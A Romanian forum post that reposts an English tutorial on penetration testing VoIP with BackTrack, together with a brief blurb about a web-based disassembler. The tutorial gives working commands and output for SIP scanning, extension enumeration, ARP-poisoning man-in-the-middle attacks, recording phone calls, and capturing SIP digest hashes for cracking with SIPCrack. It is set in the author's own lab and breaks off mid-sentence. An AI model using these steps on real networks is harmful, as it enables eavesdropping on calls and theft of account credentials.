co4ie

Eu am o retea mare VoIP la birou ... dar nu ma lasa nenorocitii sa ma atincg de ea BTW...puteam sa pun doar link-ul .. But where`s the fun in that

Pym's, web based disassembler allows to upload a file and disassemble it online. Then you can browse the code, see an example here. Pym's disassembler is a google app engine powered application that is able to disassemble some valid PE files or hexadecimal string. You can try it using the following forms. The app makes use of Pym's library, pefile and networkx libraries. Try It: pyms86.appspot.com/ LE: Am Postat aici ca totusi este un Tool ... si unul chiar foarte folositor !!

Contents [hide] 1 Penetration Testing VOIP with BackTrack 2 Typical VoIP Topologies 2.1 Self Hosted 2.2 Hosted Services 2.3 Online SIP Service 3 SIP Basics 3.1 SIP Requests / Methods 3.1.1 An Example SIP “INVITE” Request: 3.2 SIP Responses 3.2.1 An Example SIP “Trying” Response: 3.3 SIP Call Between 2 Phones Example 4 Attack Vectors 5 Information Gathering 5.1 SMAP 5.1.1 SMAP Usage: 5.1.2 Scanning a single host: 5.1.3 Scanning a range of IP addresses: 5.2 SIPSAK 5.3 SIPScan 5.3.1 Sip-scan usage: 5.3.2 Scanning a subnet: 5.4 SVMAP 5.4.1 Scanning an IP range: 5.4.2 Enabling fingerprinting scanning 5.5 Extensions Enumeration 5.5.1 Svwar 5.5.1.1 Usage: 5.5.1.2 Example: 5.5.2 Enumiax 6 Monitoring Traffic and Eavesdropping Phone calls 6.1 Arp Poisoning using Arpspoof 6.2 Capturing traffic and Eavesdropping using Wireshark 6.3 VoIPong 6.3.1 Playing the file: 6.4 Vomit 6.5 UCsniff 6.5.1 Monitor Mode Usage 6.5.2 MITM Learning Mode Usage 6.5.3 MITM Target Mode 6.6 Xplico 6.7 Capturing SIP Authentication using SIPDump 7 Attacking Authentication 7.1 Cracking SIP Digest response hashes 7.1.1 SIPCrack Usage: 7.1.2 Dictionary attack 7.1.2.1 Creating a six chars numeric dictionary: 7.1.2.2 Cracking the Digest Response: 7.1.3 Brute Force attack using John The Ripper 7.2 Brute forcing SIP Accounts 8 VLAN Hopping 8.1 VoIP Hopper 8.2 ACE 9 Denial Of Service 9.1 Inviteflood 9.2 Rtpflood 9.3 Iaxflood 9.4 Teardown 10 Spoofing Caller ID 11 Attacking VoIP Using Metasploit 11.1 Metasploit VoIP Modules 11.1.1 Auxiliaries 11.1.2 Exploits 11.2 Scanning SIP Enabled Devices 11.3 Enumerating SIP extensions / Usernames 11.4 Spoofing Caller ID auxiliary 11.5 Exploiting VoIP systems 12 Closing Words 13 About The Author 14 References Penetration Testing VOIP with BackTrack VoIP is an exciting technology which provides many benefits and cost effective solutions for communication. More and more small and enterprise businesses are replacing their old traditional telephony systems with an IP based ones. A VoIP based PBX can provide many features such as: Multiple Extensions, Caller ID, Voice mail, IVR capabilities, Recording of conversations, Logging, Usage with hardware based telephones or software based (aka soft phones). Now days there are many vendors for PBX, IP telephones, VoIP services and equipment such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON… With new technology comes a new challenge for both the defensive and offensive side of security, One of the “great” dangers of traditional phone lines was that it was susceptible to eavesdropping. The “old school” way to eavesdrop on somebody’s phone line was to physically connect a small transmitter which was connected inside or outside their premises somewhere along the phone cord. IP telephony systems are also susceptible to eavesdropping, doing so in an IP environment is a little bit more difficult to execute, detect and require more the knowledge and the right set of tools. In this article we won’t discuss a particular vendor or technique but we will take a look at the concepts and the tools available for attacking VoIP available for us in Backtrack Linux. The main goal of this article is to present the tools and their purpose in order to help you choose the right tool for the right situation. We will examine some real world attack vectors and discover how BackTrack can assist us pentesting VoIP; we will also examine some of the tools which present in BackTrack and their usage. Typical VoIP Topologies There are several ways IP based telephony can be implemented, here are some common topologies and usage: Self Hosted A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony service provider PSTN via a SIP Trunk/PRI, the VoIP traffic flows through a dedicated Vlan. Hosted Services There is no need for a PBX at site. Just a switch, a router, IP phones and a connection to the service provider PBX via internet or IP/VPN connection, each phone is configured with SIP account information. Online SIP Service Services like sipme.me provides an application for pc or smart phones and a free sip account, Offering low price for international calls and free calls between the service users by assigning a pone number to each subscriber. SIP Basics The SIP (Session Initiation Protocol) role is to setup, terminate or modify a voice or a video call where the voice and/or video traffic are being carried by a protocol like RTP (Real time transport Protocol). SIP is an application layer protocol which uses UDP for transport (TCP and SCTP can be used as well). SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TLS. SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response model. Much like an HTTP request from a browser a SIP client request is made using a SIP URI a user agent and a method/request. SIP uses e-mail like addresses format: user/phone@domain/ip A typical SIP URI looks like: sip:205@192.168.1.100, sip:username@pbx.com , sip:205@192.168.1.100:5060 According to the request made by the client a response will be received with a status or error code, the following tables describe the available requests and responses in the SIP protocol. SIP Requests / Methods [table=width: 500, class: grid, align: center] [tr] [td]Request[/td] [td]Description[/td] [/tr] [tr] [td]INVITE [/td] [td]Used to invite and account to participate in a call session. [/td] [/tr] [tr] [td]ACK[/td] [td]Acknowledge an INVITE request. [/td] [/tr] [tr] [td]CANCEL[/td] [td]Cancel a pending request. [/td] [/tr] [tr] [td]REGISTER[/td] [td]Register user with a SIP server[/td] [/tr] [tr] [td]OPTIONS[/td] [td]Lists information about the capabilities of a caller[/td] [/tr] [tr] [td]BYE[/td] [td]Terminates a session between two users in a call. [/td] [/tr] [tr] [td]REFER[/td] [td]Indicates that the recipient(identified by the Request URI) should contact a third party using the contact information provided in the request. [/td] [/tr] [tr] [td]SUBSCRIBE[/td] [td]The SUBSCRIBE method is used to request current state and state updates from a remote node. [/td] [/tr] [tr] [td]NOTIFY[/td] [td]The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred. [/td] [/tr] [/table] “INVITE” Request: INVITE sip:201@192.168.1.104 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar Max-Forwards: 70 To: 201@192.168.1.104 SIP Responses [table=width: 500, class: grid, align: center] [tr] [td]Response[/td] [td]Description [/td] [/tr] [tr] [td]1xx [/td] [td]Informational responses, Request received and being processed. [/td] [/tr] [tr] [td]2xx[/td] [td]Successful responses The action was successfully received, understood, and accepted. [/td] [/tr] [tr] [td]3xx[/td] [td]Redirection responses [/td] [/tr] [tr] [td]4xx[/td] [td]Request failure responses The request contains bad syntax or cannot be fulfilled at the server. [/td] [/tr] [tr] [td]5xx[/td] [td]Server failure responses The server failed to fulfill an apparently valid request. [/td] [/tr] [tr] [td]6xx[/td] [td]Global failure responses The request cannot be fulfilled at any server. [/td] [/tr] [/table] An Example SIP “Trying” Response: SIP/2.0 100 Trying Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060 From: "NIghtRanger" 200@192.168.1.104 SIP Call Between 2 Phones Example The calling phone sends an invite. The called phone sends back a response of 100 (Trying). The called phone then starts to ring and sends a response of 180 (Ringing). When the caller picks up the phone the called phone sends a response of 200 (OK). The calling phone sends an ACK response. Conversation begins via RTP. When the caller hangs up the phone a BYE request is sent. The calling phone responds with 200 (OK). Attack Vectors Before we get started with the tools let’s have a look at some common VoIP attack vectors: Information Gathering, Footprinting and Enumeration. Monitoring Traffic and eavesdropping Phone calls. Attacking Authentication. VLAN Hopping. Denial of Service / Flooding. Spoofing Caller ID. In order to test the tools I have setup a TRIXBOX PBX System and created 6 extensions. I will be using two soft phones, 1 is Linux based client called Twinkle and the 2nd is a Windows based client called X-Lite. I will be using the latest and greatest release of Backtrack Linux which is R2. You can find Most of the VoIP attack tools in Backtrack under the “/pentest/voip/” directory: root@bt:~# cd /pentest/voip/ root@bt:/pentest/voip# Or you can simply navigate using the KDE menu to the “Backtrack” ? “Voice Over IP” sub menus : Information Gathering This phase is where we gather information about the topology, servers and clients to learn as much information as we can in order to launch a successful attack. What we are interested in finding is live hosts, PBX type and version, VoIP servers/gateways, clients (hardware and software) types and versions etc… Instead of enumerating “usernames” we will be enumerating SIP extensions. Let’s take a look at some of the tools which available in Backtrack to help us find, identify and enumerate VoIP enabled devices. SMAP Backtrack includes a great tool called SMAP which is a simple scanner for SIP enabled devices SMAP sends off various SIP requests awaiting responses from SIP enabled DSL router, proxies and user agents. It could be considered a mash up of NMAP and sipsak. SMAP Usage: root@bt:/pentest/voip/smap# ./smap smap 0.6.0 s@123.org Scanning a single host: root@bt:/pentest/voip/smap# ./smap 192.168.1.104 smap 0.6.0 s@123.org Scanning a range of IP addresses: root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24 smap 0.6.0 s@123.org Now that we have identified sip enabled hosts we can use SMAP to fingerprint the server/client type and version: root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104 smap 0.6.0 s@123.org In case SMAP could not fingerprint our host we use the –l argument to put it in learning mode to provide some useful information: root@bt:/pentest/voip/smap# ./smap -l 192.168.1.104 smap 0.6.0 s@123.org Another useful feature of SMAP is the –d argument which enables debug output for verbosity try to use the –o along with it to view the fingerprinting process in details. root@bt:/pentest/voip/smap# ./smap -d 192.168.1.104 smap 0.6.0 s@123.org SIPSAK SIPSAK is used for testing SIP enabled applications and devices using the OPTION request method only. We can use it to fingerprint and enumeration. You won’t find sipsak in the “/pentest/voip/ “ directory; you can execute it from any location by simply typing sipsak. root@bt:~# sipsak sipsak 0.9.6 by Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright (C) 2004-2005 Nils Ohlmeier report bugs to nils@sipsak.org shoot : sipsak [-f FILE] [-L] -s SIPURI trace : sipsak -T -s SIPURI usrloc : sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] NUMBER] [-z NUMBER] -s SIPURI usrloc : sipsak -I|M [-b NUMBER] [-e NUMBER] -s SIPURI usrloc : sipsak -U [-C SIPURI] NUMBER] -s SIPURI message: sipsak -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI flood : sipsak -F [-e NUMBER] -s SIPURI random : sipsak -R [-t NUMBER] -s SIPURI additional parameter in every mode: [-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [-n] [-N] [-r PORT] [-v] [-V] [-w] -h displays this help message -V prints version string only -f FILE the file which contains the SIP message to send use - for standard input -L de-activate CR (\r) insertion in files -s SIPURI the destination server uri in form sip:[user@]servername[:port] -T activates the traceroute mode -U activates the usrloc mode -I simulates a successful calls with itself -M sends messages to itself -C SIPURI use the given uri as Contact in REGISTER -b NUMBER the starting number appendix to the user name (default: 0) -e NUMBER the ending numer of the appendix to the user name -o NUMBER sleep number ms before sending next request -x NUMBER the expires header field value (default: 15) -z NUMBER activates randomly removing of user bindings -F activates the flood mode -R activates the random modues (dangerous) -t NUMBER the maximum number of trashed character in random mode (default: request length) -l PORT the local port to use (default: any) -r PORT the remote port to use (default: 5060) -p HOSTNAME request target (outbound proxy) -H HOSTNAME overwrites the local hostname in all headers -m NUMBER the value for the max-forwards header field -n use FQDN instead of IPs in the Via-Line -i deactivate the insertion of a Via-Line -a PASSWORD password for authentication (if omitted password="") -u STRING Authentication username -d ignore redirects -v each v produces more verbosity (max. 3) -w extract IP from the warning in reply -g STRING replacement for a special mark in the message -G activates replacement of variables -N returns exit codes Nagios compliant -q STRING search for a RegExp in replies and return error on failure -W NUMBER return Nagios warning if retrans > number -B STRING send a message with string as body -O STRING Content-Disposition value -P NUMBER Number of processes to start -A NUMBER number of test runs and print just timings -S use same port for receiving and sending -c SIPURI use the given uri as From in MESSAGE -D NUMBER timeout multiplier for INVITE transactions and reliable transports (default: 64) -E STRING specify transport to be used -j STRING adds additional headers to the request Here is an example for using sipsak to fingerprint a sip enabled device We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway. root@bt:~# sipsak -vv -s sip:192.168.1.221 message received: SIP/2.0 200 OK Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias From: sip:sipsak@127.0.1.1:51601;tag=97ac9e5 To: sip:192.168.1.221;tag=1c1785761661 Call-ID: 159042021@127.0.1.1 CSeq: 1 OPTIONS Contact: Supported: em,100rel,timer,replaces,path,resource-priority Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE Server: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005 X-Resources: telchs=4/0;mediachs=0/0 Accept: application/sdp, application/simple-message-summary, message/sipfrag Content-Type: application/sdp Content-Length: 343 v=0 o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221 s=Phone-Call c=IN IP4 192.168.1.221 t=0 0 m=audio 6000 RTP/AVP 18 8 0 127 a=rtpmap:18 G729/8000 a=fmtp:18 annexb=no a=rtpmap:8 PCMA/8000 a=rtpmap:0 PCMU/8000 a=rtpmap:127 telephone-event/8000 a=fmtp:127 0-15 a=ptime:20 a=sendrecv a=rtcp:6001 IN IP4 192.168.1.221 ** reply received after 67.923 ms ** SIP/2.0 200 OK final received SIPScan Sip-scan is a simple scanner for sip enabled hosts it can scan a single host or an entire subnet. Sip-scan usage: root@bt:/pentest/voip/sipscan# ./sip-scan --help ./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05), running under Perl version 5.10.0. Usage: sip-scan [options] -v Be verbose. -i ip|if Interface/IP for SIP-headers (default: IP from ppp0) -p port remote port to scan. (default: 5060) -l port local origin of packets. (default: 5060) -d n[p] Wait n ms after each sent packet (default: 50ms) or if 'p' is given, send n packets per second (default: 20) -w n Wait n ms for remaining answers (default: 2000ms) Network spec contains the wildcard * or ranges n-m. Scanning a subnet: root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254 192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.22: Asterisk PBX 192.168.1.104: Asterisk PBX 192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055 192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27 192.168.1.219: "Exelmind Call-Control Switch (CCS)" 192.168.1.248: MailVision HostLynx/2.1 'GA' SVMAP SVMAP is a part of a suite of tools called SIPVicious and it’s my favorite scanner of choice It can be used to scan identify and fingerprint a single IP or a range of IP addresses. Svmap allows specifying the request method which is being used for scanning, the default method is OPTIONS, it offers debug and verbosity options and even allows scanning the SRV records for SIP on the destination domain. You can use the ./svmap –h in order to view all the available arguments root@bt:/pentest/voip/sipvicious# ./svmap.py Usage: svmap.py [options] host1 host2 hostrange examples: svmap.py 10.0.0.1-10.0.0.255 \ > 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \ > 1.1.1.1-20 1.1.2-20.* 4.1.*.* svmap.py -s session1 --randomize 10.0.0.1/8 svmap.py --resume session1 -v svmap.py -p5060-5062 10.0.0.3-20 -m INVITE Scanning an IP range: root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 | SIP Device | User Agent | Fingerprint | ---------------------------------------------------- | 192.168.1.104:5060 | Asterisk PBX | disabled | | 192.168.1.103:5060 | Twinkle/1.4.2 | disabled | Enabling fingerprinting scanning root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 --fp Extensions Enumeration Extension enumeration can aid an attacker by finding valid extensions on a VoIP system which later can lead to a brute force attack on the SIP accounts. Extension enumeration works by examining errors returned by a sip requests methods like REGISTER, OPTIONS and INVITE Svwar Svwar is also a tool from the sipvicious suite allows to enumerate extensions by using a range of extensions or using a dictionary file svwar supports all the of the three extension enumeration methods as mentioned above, the default method for enumeration is REGISTER. Usage: root@bt:/pentest/voip/sipvicious# ./svwar.py Usage: svwar.py [options] target examples: svwar.py -e100-999 10.0.0.1 svwar.py -d dictionary.txt 10.0.0.2 Example: root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 | Extension | Authentication | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth | Svwar has identified all the extensions I’ve created on my Trixbox server. You can specify another sip method by using the –m argument, you can also add t –v or –vv for verbosity. root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -v INFO:TakeASip:trying to get self ip .. might take a while INFO:root:start your engines INFO:TakeASip:Ok SIP device found INFO:TakeASip:extension '200' exists - requires authentication INFO:TakeASip:extension '201' exists - requires authentication -----Edit---- INFO:TakeASip:extension '203' exists - requires authentication INFO:TakeASip:extension '303' exists - requires authentication INFO:TakeASip:extension '303' exists - requires authentication INFO:TakeASip:extension '305' exists - requires authentication INFO:root:we have 6 extensions | Extension | Authentication | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO:root:Total time: 0:00:21.944731 Enumiax Enumiax is used to enumerate Asterisk Exchange protocol usernames. It allows for a dictionary attack or a sequential Username Guessing root@bt:/pentest/voip/enumiax# ./enumiax enumIAX 1.0 Dustin D. Trammell rammell@tippingpoint.com Monitoring Traffic and Eavesdropping Phone calls Monitoring VoIP traffic can allow an attacker capture SIP requests and RTP data sent from clients to server and back. It can serve two attack vectors: Capturing SIP authentication (we will later discuss this topic in the attacking authentication section). Eavesdropping users phone calls. For demonstration purposes we will use the following scenario: For this attack vector we will need to perform a Man in The Middle Attack which will require the following steps: Arp poisoning/spoofing Sniffing traffic Decoding RTP data to an audio file. Arp Poisoning using Arpspoof Before we can begin to sniff traffic we will need to arp poison our switch/gateway, we’ll be using a tool called “Arpspoof” which is located in “/usr/sbin/Arpspoof” folder in Backtrack, in fact you can just invoke it from anywhere by typing: arpspoof Before we can use arpspoof we will need to enable IP forwarding: root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward Arpspoof syntax should look as follows: root@bt:~# arpspoof Version: 2.4 Usage: arpspoof [-i interface] [-t target] host For a successful MITM attack we will need to spoof both ways: arpspoof –t victim gateway arpspoof –t gateway victim We will let our Arp poisoning run in the background while performing a capture using Wireshark. Capturing traffic and Eavesdropping using Wireshark Now let’s fire up Wireshark to capture some traffic. We will use the following Wireshark capture filter: not broadcast and not multicast and host 192.168.1.118 Now let’s start capturing some traffic… While sniffing for traffic User “B” has launched the X-Lite soft phone on his desktop computer and dialed to user “A” extension 200. Wireshark has captured some traffic, after a while I have stopped the capture process and saved the sessions into a file called “sip.pcap”. We can see that we have captured the SIP traffic but for this section we are more interested in the RTP traffic because it contains the actual conversation data. Wireshark has a pretty cool feature to decode captured VoIP calls data into playable audio format You can find this feature under the Statistics -> VoIP Calls menu. VoIPong VoIPong is a utility which detects all Voice over IP calls on a pipeline, and for those which are G711 encoded, dumps actual conversation to separate wave files. It supports SIP, H323, Cisco's Skinny Client Protocol, RTP and RTCP. VoIPong is located in Backtrack “/pentest/voip/voipong” directory Before we can use VoIPong we will need to make some changes to the voipong.conf file: root@bt:/pentest/voip/voipong# nano etc/voipong.conf soxpath = /usr/bin/sox networksfile = /pentest/voip/voipong/etc/voipongnets outdir = /pentest/voip/voipong/output/ device = eth0 # your network interface card name Now we can start VoIPong to capture some VoIP conversations root@bt:/pentest/voip/voipong# ./voipong -c etc/voipong.conf -d4 -f Once VoIPong detects a phone call it will start capture it once it finish VoIPong will stop the capture process and will render it to a playable wave file. All conversation will be saved into the “/pentest/voip/voipong/output” folder Playing the file: Vomit Vomit converts a Cisco IP phone RTP conversation into a wave file that can be played with ordinary sound players. Vomit requires a tcpdump output file. In order to get vomit up and running we will need to download and install waveplay Get it here: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html root@bt:~# tar -xzvf waveplay-20010924.tar.gz waveplay-20010924/ waveplay-20010924/Makefile waveplay-20010924/waveplay.c waveplay-20010924/waveplay.ja.1 waveplay-20010924/wavefmt.h waveplay-20010924/README waveplay-20010924/waveplay.1 waveplay-20010924/README.jp root@bt:~# cd waveplay-20010924 root@bt:~/waveplay-20010924# make cc -c -o waveplay.o waveplay.c cc waveplay.o -o waveplay root@bt:~/waveplay-20010924# cp waveplay /usr/bin/ root@bt:/pentest/voip/vomit# ./vomit-r sip.dump | waveplay -S8000 -B16 -C1 UCsniff UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. UCSniff supports Arp poisoning, VLAN Hopping, VLAN Discovery via CDP, it has a sniffer capabilities and more… I consider it as an all in one eavesdropping tool. Let’s take a look at some usage examples: UCSniff can operate in 2 modes Monitor mode – Should be used on a shared media where the IP phones connected to i.e : a HUB, wireless access point, it can be also be used in a switched environment by setting up a SPAN sessions on a Cisco switch. Man in the middle mode – This mode has 2 additional modes which are Learning Mode Targeted Mode Preparing UCSniff so we can run it from any location in backtrack: root@bt:/tmp# cd /pentest/voip/ucsniff/ root@bt:/pentest/voip/ucsniff# ./configure root@bt:/pentest/voip/ucsniff# make root@bt:/pentest/voip/ucsniff# make install Monitor Mode Usage root@bt:/tmp/ucsniff# ucsniff -i eth0 -M UCSniff 2.1 starting Running in Monitor Mode File directory-users.txt can't be opened for reading in working directory File targets.txt can't be opened for reading in working directory Listening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0 Starting Unified sniffing... Warning: Please ensure that you hit 'q' when you are finished with this program. Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS. SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118) SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104) SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:7-3-both.wav' SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:8-2-both.wav' Closing text interface... Unified sniffing was stopped. We can stop the sessions by pressing on the Q key. Several files were created by UCSniff: Log files – Contains detailed information about sip transactions Pcap files – capture file which can be viewed in wireshark audio wav files – conversation audio files root@bt:/tmp/ucsniff# ls -l total 376 -rw-r--r-- 1 root root 40854 Feb 5 05:02 200-Calling-201-5:2:7-3-both.wav -rw-r--r-- 1 root root 115818 Feb 5 05:02 200-Calling-201-5:2:7-3.pcap -rw-r--r-- 1 root root 46294 Feb 5 05:02 200-Calling-201-5:2:8-2-both.wav -rw-r--r-- 1 root root 103940 Feb 5 05:02 200-Calling-201-5:2:8-2.pcap -rw-r--r-- 1 root root 278 Feb 5 05:02 call_detail_log -rw-r--r-- 1 root root 317 Feb 5 05:02 call_log -rw-r--r-- 1 root root 10063 Feb 5 05:02 sip.log -rw-r--r-- 1 root root 39073 Feb 5 05:02 sipdump.pcap -rw-r--r-- 1 root root 0 Feb 5 05:01 skinny_log MITM Learning Mode Usage This mode uses a signaling protocol (SIP, Skinny) to map extensions to an IP Addresses. You can customize the targets to only intercept specific IP Addresses or Networks. In the following example we assume we are on the VoIP VLAN UCSniff will Arp poison all hosts on the subnet. root@bt:/tmp/ucsniff# ucsniff -i eth0 // // UCSniff 2.1 starting Listening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0 Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name: SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104) SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:4-2-both.wav' Closing text interface... ARP poisoner deactivated. RE-ARPing the victims... Unified sniffing was stopped. If we take a look at UCSniff log files we can see the discovered targets used in the attack. root@bt:/tmp/ucsniff# cat targets.txt 192.168.1.118,201,,sip 192.168.1.104,200,,sip MITM Target Mode Target Mode enables Eavesdropping at a layer higher than just random audio streams or the IP address of phones for which you don't know the extension. This mode has 2 sub modes: Targeted User Targeted Conversation We can add targets manually to the “targets.txt” file in the following format: x.x.x.x,extension,,sip 192.168.1.118,201,,sip Or use learning mode to auto discover hosts root@bt:/tmp/ucsniff# ucsniff -i eth0 -T UCSniff 2.1 starting File targets.txt can't be opened for reading in working directory No targets have been previously discovered in Targets file, targets.txt Please run UCSniff in learning mode, or manually edit targets.txt Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode: root@bt:/tmp/ucsniff# ucsniff -i eth0 -T UCSniff 2.1 starting Parsed 2 entries in Targets file, targets.txt UCSniff running in target mode. Parsed 2 previously discovered targets Please select a Targeted Eavesdropping Mode: 1. User Description: Eavesdrop on all calls to or from a particular endpoint. 2. Conversation Description: Eavesdrop on bi-directional conversation flows between two selected endpoints. Please select option (1) or (2): Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network. In "Conversation", two endpoints are selected and the network is ARP Poisoned to only intercept the traffic between those two users. UCSniff includes more useful tools and attacks modes like VLAN hopping (using ACE) which will be discussed later. Xplico Although Xplico is not in the Backtrack voip tools directory, it is a very useful tool for capturing SIP and RTP traffic (among other protocols). Xplico can be found in the Backtrack -> Digital Forensics -> Forensic Analysis menu In case it is not present on your Backtrack installation you can simply install it by issuing the following command: root@bt:~# apt-get install xplico Xplico can be used to capture live traffic or import a Wireshark PCAP capture file. Either way Xplico will decode the captured packets and will assemble them into the appropriate format In our case it will be SIP and RTP. After executing Xplico you will be asked to login, the default username and password are: xplico Once we have successfully logged in to Xplico we will need to create a case We will be asked to choose between a live capture or to import a PCAP file In this example we will use Xplico to perform a live capture (we will Arp poison our targets in the background using arpspoof). Now we will have to choose our case and create a new session By choosing our newly created session we will see our main statistics page with the option to choose our network adapter and start/stop the capture process. Here is an example for captured SIP traffic: An example for RTP decoded traffic: Capturing SIP Authentication using SIPDump SIPDump is a part of the SIPCrack tools suite, it allows performing a live capture of SIP authentication digest response or it can dump a previously captured sessions from a PCAP file. SIPDump Usage: root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 SIPdump 0.3 ( MaJoMu | www.codito.de ) --------------------------------------- Usage: sipdump [OPTIONS] = file where captured logins will be written to Options: -i = interface to listen on -p = use pcap data file -m = enter login data manually -f "" = set libpcap filter * You need to specify dump file Live capture using SIPDump: root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt SIPdump 0.3 ( MaJoMu | www.codito.de ) --------------------------------------- * Using dev 'eth0' for sniffing * Starting to sniff with packet filter 'tcp or udp or vlan' * Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200') * Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200') * Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200') Dumping authentication data from a PCAP file root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txt SIPdump 0.3 ( MaJoMu | www.codito.de ) --------------------------------------- * Using pcap file '/root/registration.pcap' for sniffing * Starting to sniff with packet filter 'tcp or udp or vlan' * Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200') * Exiting, sniffed 1 logins SIPDump will write the authentication challenge response to the specified file which looks as follows: 192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968 192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc 192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108 We will disscuss cracking these challenges in the attacking authentication chapter. Attacking Authentication SIP can be susceptible to 2 types of authentication attacks, before we take a look at these attacks types let’s understand how’s a SIP registration and authentication process takes place. SIP uses a digest authentication which is a mechanism that the HTTP protocol uses and known as HTTP digest. Because SIP is an ASCII based protocol the authentication details are hashed in order to prevent them to transport in clear text. When a SIP client (User Agent) wants to authenticate with a SIP server, the server generates and sends a digest challenge to the client, it contains the following parameters: Realm - used to identify credentials within as SIP message, usually it is the sip domain. Nonce - this is an md5 unique string which is generated by the server for each registration request it is made from a time stamp and a secret phrase to ensure it has a limited lifetime and could be not be used again. Once the client receives the digest challenge and the user enters his credentials the client uses the nonce to generate a digest response and sends it back to the server. With that said, let’s try to crack the digest response in order to obtain a valid SIP account password. Cracking SIP Digest response hashes Backtrack provides a great tool called SIPCrack, We already discussed how to capture a valid SIP authentication digest response using SIPDump. SIPCrack can be found in root@bt:/pentest/voip/sipcrack# SIPCrack Usage: root@bt:/pentest/voip/sipcrack# ./sipcrack SIPcrack 0.3 ( MaJoMu | www.codito.de ) ---------------------------------------- Usage: sipcrack [OPTIONS] [ -s | -w ] = file containing logins sniffed by SIPdump Options: -s = use stdin for passwords -w wordlist = file containing all passwords to try -p num = print cracking process every n passwords (for -w) (ATTENTION: slows down heavily) * Either -w or -s has to be given SIPCrack can operate in two modes: Dictionary attack STDIN Dictionary attack Backtrack provides some basic dictionaries which are located in: root@bt:/pentest/passwords/wordlists But for the purpose of this article I will use another grate tool in backtrack called Crunch which is used to create custom dictionaries. Let’s use crunch to create a six characters numeric dictionary Crunch is located in: root@bt:/pentest/passwords/crunch# Crunch Usage: usage: crunch [-f /path/to/charset.lst charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number] For detailed crunch usage check its manual: root@bt:/pentest/passwords/crunch# man crunch Creating a six chars numeric dictionary: root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt Crunch will now generate 7000000 bytes of data Crunch will now generate 6 MB of data Crunch will now generate 0 GB of data 100% We will use a previously captured sip credentials stored by SIPDump in the auth.txt file ans sipass.txt as the dictionary (which we created using 